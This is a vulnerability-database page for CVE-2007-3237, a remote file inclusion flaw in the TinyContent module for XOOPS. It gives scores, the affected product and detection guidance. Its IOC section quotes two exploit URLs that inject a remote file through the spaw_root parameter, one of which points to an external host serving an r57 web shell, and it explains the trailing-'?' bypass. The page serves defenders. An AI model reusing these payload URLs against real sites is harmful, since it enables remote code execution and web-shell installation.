cbcvebase.
CVE-2007-3237
published 2007-06-15

CVE-2007-3237: PHP remote file inclusion vulnerability in admin/spaw/spaw_control.class.php in the TinyContent 1.5 module for XOOPS allows remote attackers to execute…

PriorityP350medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
67.66%
99.2th percentile
PHP remote file inclusion vulnerability in admin/spaw/spaw_control.class.php in the TinyContent 1.5 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656.

Affected

1 ranges
VendorProductVersion rangeFixed in
xoopstinycontent_module

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://www.site.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=evilcode.txt?
urlhttp://www.wiscpsa.org/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ekin0x.com/r57.txt?
pathadmin/spaw/spaw_control.class.php
  • Detect HTTP requests targeting the vulnerable script path with a URL-valued spaw_root parameter, indicating remote file inclusion attempt.
  • The spaw_root parameter is the injection point; monitor GET requests to spaw_control.class.php where spaw_root contains an external URL (http:// or https://).
  • The vulnerable module path is modules/tinycontent/admin/spaw/spaw_control.class.php — alert on any external access to this path.
  • ·This CVE is noted as probably a duplicate of CVE-2006-4656; detections may overlap with that earlier vulnerability in the same SPAW component.
  • ·The exploit appends a trailing '?' to the injected URL to nullify the remainder of the include path — detection rules should account for this bypass technique.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.